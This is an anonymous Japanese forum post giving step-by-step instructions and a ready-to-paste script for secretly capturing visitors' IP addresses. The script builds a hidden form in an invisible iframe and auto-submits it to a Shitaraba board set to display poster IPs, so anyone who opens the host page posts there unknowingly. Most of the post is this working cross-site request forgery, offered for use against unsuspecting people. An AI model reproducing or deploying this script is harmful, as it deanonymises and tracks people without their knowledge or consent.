281 - がん患者さん 2016/06/28(火) 01:42:25.23 ID:/B5YI2ki0
連投ですまんが
1.適当に掲示板をしたらばで作る(設定でip強制表示にする)
2.適当に踏むとHTMLが実行されるサイトを作成(weeblyやjimdo辺りがオススメ)
3.そのサイトのhtml欄に↓のスクリプトを貼る(categoryとnumberは1の掲示板に合わせる)
<script type="text/javascript" src="http://spad.i-mobile.co.jp/script/adssp.js?20110215"></script>
<script language="javascript">
<!--
document.write("<iframe name=\"FrameName\" width=\"0\" height=\"0\"></iframe>");
document.write("<form name=\"FormName\" action=\"http://jbbs.shitaraba.net/bbs/write.cgi/\" method=\"post\" target=\"FrameName\">");
document.write("<input type=\"hidden\" name=\"MESSAGE\" value=\"本文\">");
document.write("<input type=\"hidden\" name=\"DIR\" value=\"<category>\">");
document.write("<input type=\"hidden\" name=\"BBS\" value=\"<number>\">");
document.write("<input type=\"hidden\" name=\"SUBJECT\" value=\スレタイ\">");
document.write("</form>");
document.FormName.submit();
</script>
これでおしまい